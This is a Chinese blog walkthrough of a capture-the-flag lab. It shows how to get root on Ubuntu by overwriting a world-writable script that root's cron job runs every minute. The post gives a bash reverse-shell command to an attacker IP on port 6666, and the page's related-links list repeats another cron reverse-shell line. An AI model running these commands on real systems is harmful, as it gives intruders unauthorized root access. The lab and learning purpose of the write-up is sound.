Ubuntu计划任务反弹shell提权

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量1.6k 收藏 1
点赞数 1
分类专栏: Linux提权 文章标签: ubuntu 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122287060
版权

Ubuntu计划任务反弹shell提权:

文中通过查看计划任务,修改计划任务的执行脚本,从而反弹root权限的shell,实现提权效果。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

原理:

ubuntu计划任务反弹shell,主要通过查看是否有高权限账号在定时执行某个脚本任务,如果有,那么可利用命令查看具体路径;
那么我们就可以重新通过这个脚本编写自己的反弹shell,从而达到获取root权限。
图中可以看出/var/spool/cron/crontabs/root 这个目录是root任务文件,默认必须是root权限才能进行查看,否则无法查看:
这里我们可以看出如果不是root用户是没有权限进行查看这个文件的。
在这里插入图片描述
这个文件主要是root用户一个定时计划任务:
这里表示每一分钟会执行一次,所以当我们如果可以对这个文件内容进行修改,写一个反弹shell进行此文件;
那么我们就可以获取一个root权限。
可以看出任何用户对这个文件都有写入的权限:
在这里插入图片描述

漏洞复现:

我们webshell获取的权限,并不能使用命令来进行查看计划任务。

tail -f /var/log/syslog

在这里插入图片描述
通过使用ssh密钥方法成功登陆获取web1用户,发现web1可以使用命令查看计划任务。
在这里插入图片描述
从这个上面我们可以看出root用户,每一分钟都在执行一个py文件。
那我们就将这个文件修改成bash反弹的代码,让他去执行,从而获得root权限。
这里先将这个文件进行备份,然后获取权限后,再将这个文件还原。

cp /script/cleanup.py /tmp/cleanup.py.bak
bash -i >& /dev/tcp/192.168.45.135/6666 0>&1

在这里插入图片描述
在这里插入图片描述
当这个计划任务再执行的时候,我们就会成功反弹一个root权限的shell。
在这里插入图片描述
还原计划任务py文件:

cp /tmp/cleanup.py.bak /script/cleanup.py

在这里插入图片描述

全局变量Global
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Ubuntu内核提权(CVE-2017-16995)
weixin_68652890的博客
04-15 734
内核提权 环境: 墨者靶场 工具 msf linux-exploit-suggester-master xshell 利用 xshell连接发现是hack权限 上传linux-exploit-suggester.sh到服务器 Possible Exploits:   CVE-2017-16995   CVE-2016-5195 CVE-2016-5195也可以利用 我们这里利用CVE-2017-16995进行提权 影响 CVE-2017-16995 Linux
Ubuntu计划任务反弹shell
18年3月萌新白帽子
08-19 4137
首先介绍一下实验环境 1.被攻击者:Ubuntu 192.168.0.8 2.攻击者:kali  192.168.0.127   首先第一步在Ubuntu系统下添加crontab 计划任务 * * * * * bash -i  >& /etc/tcp/192.168.0.127/8888 0>&1   第二步在kali系统下使用nc命令监听8888端口...
Ubuntu 10.10 提权教程
02-10
Ubuntu 10.10 提权教程 告诉你Ubuntu应该怎么提权
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1312
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
ubuntu计划任务反弹shell
秋水的博客
10-01 2300
实验环境 ubuntu 14.04 x64位:192.168.1.115 kali/win10:192.168.1.108/107 所用工具:netcat(瑞士军刀) 计划任务 至于计划任务是什么我觉大不需要太多解释,就是定时执行任务的意思那么接下来看看计划任务的格式,以及书写 crond 是linux用来定期执行程序的命令,如果未安装需要先安装,不在多说 cron服务提供cr...
Ubuntu使用crontab使用反弹shell问题处理
SHELLCODE_8BIT的博客
12-15 666
原因是在ubuntu下crontab启动默认使用dash来启动,而在dash启动会失败,我们可以来尝试一下。使用dash启动,会直接报如下错误。在ubuntu环境下做攻击时,会遇到下列情况,使用crontab写入如下命令反弹,会失败。ubuntu反弹SHELL正确用法是。
ubuntu利用crontab反弹shell
qq_68163788的博客
11-14 974
Ubuntu中,反弹shell是指在远程服务器上建立一个与本地计算机的交互式连接,以便可以在远程服务器上执行命令和操作。这种连接通常是通过网络进行的,允许用户在不直接登录到远程服务器的情况下,进行远程管理和操作。 反弹shell通常使用一些常见的工具和技术来实现,包括SSH、Netcat、Metasploit等。用户可以在本地计算机上直接操作远程服务器,执行命令、浏览文件等操作。需要注意的是,反弹shell可能存在安全风险,因此在实际使用中应当谨慎操作,并确保对服务器进行充分的安全防护。
ubuntu本地内核提权37292.c
08-06
ubuntu本地内核提权
ubuntu-39772提权文件
02-14
ubuntu-39772提权文件
ubuntu:用于自动Ubuntu服务器设置的Shell脚本
02-06
ubuntu:用于自动Ubuntu服务器设置的Shell脚本
Ubuntu常用Shell命令.xmind
06-28
Ubuntu常用Shell命令.xmind
Ubuntu下新建shell文件.txt
02-22
Ubuntu下新建shell文件,我妈看了都会
Ubuntu 本地内核提权 (CVE-2017-16995)
震山的博客
08-07 1437
Ubuntu 本地提权再现
Ubuntu 16.04提权
Rakish Leilie
03-26 969
这里选用一个 4.4.x 相对通用的提权方式(Privilege Escalation表示提权)。文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。kali启动http服务,将exploit.tar文件复制到网站根目录。需要将exploit.tar上传到目标主机,并解压运行~在目标机器上使用wget进行下载。使用wget下载,出现404。文件中提到的使用方式进行操作。解压exploit.tar文件。已经获取到了root权限。📌实验环境:DC-3靶机。文件中的方式进行操作。
〖EXP〗Ubuntu 18.04提权Linux 4.10 < 5.1.17 (CVE-2019-13272)
K8哥哥
01-21 3779
简介 Ubuntu 18.04 提权Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272) 测试 // Tested on: // - Ubuntu 16.04.5 kernel 4.15.0-29-generic // - Ubuntu 18.04.1 kernel 4.15.0-20-generic // - Ubuntu 19.04 kernel 5.0.0-15-generic // - Ubuntu Mate 18.04.
Ubuntu用户提权到Root
skysys的研究小屋
03-12 3247
shell里面输入 sudo vim /etc/passwd 将里面的当前用户的ID值进行修改。譬如我的当前用户是chenjieb 则找到了 chenjieb:x:1000:1000:Administrator,,,:/home.chenjieb:/bin/bash 将两个1000改成0即可。即最后改完的结果为: chenjieb:x:0:0:Administrator,,,:/home.chenjieb:/bin/bash 最后将Ubuntu系统进行注销,然后在登陆的用户名里输入 你自己的用
Ubuntu下如何将普通用户提升到root权限
xiayufeng520的专栏
08-22 514
Ubuntu下如何将普通用户提升到root权限 转自:http://blog.csdn.net/chenjieb520/article/details/7316268 提升的方法如下: 在shell里面输入  sudo gedit /etc/passwd   将里面的当前用户的ID值进行修改。 譬如我的用户是chenjieb,找到了chenjieb:x:1000:1000:Admini
Ubuntu获取root权限
m0_62379203的博客
05-08 2068
Ubuntu获取root权限
redis写任务计划反弹shell
09-15
根据提供的引用内容,Redis可以通过计划任务反弹shell。具体步骤如下: 1. 在Redis服务器上创建一个计划任务。可以使用CRON表达式来指定计划任务的执行时间。 2. 在计划任务中编写一段脚本,用于反弹shell到黑客主机上。脚本内容可以包括反弹shell的命令和目标主机的IP地址和端口号。 3. 将该计划任务设置为root用户权限,以便执行反弹shell操作。 需要注意的是,这个方法在CentOS操作系统下通常是可行的,但在Ubuntu系统下可能不适用。此外,在Windows系统上安装Redis并进行此操作的情况相对较少。 希望这个回答解决了你的问题。如有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值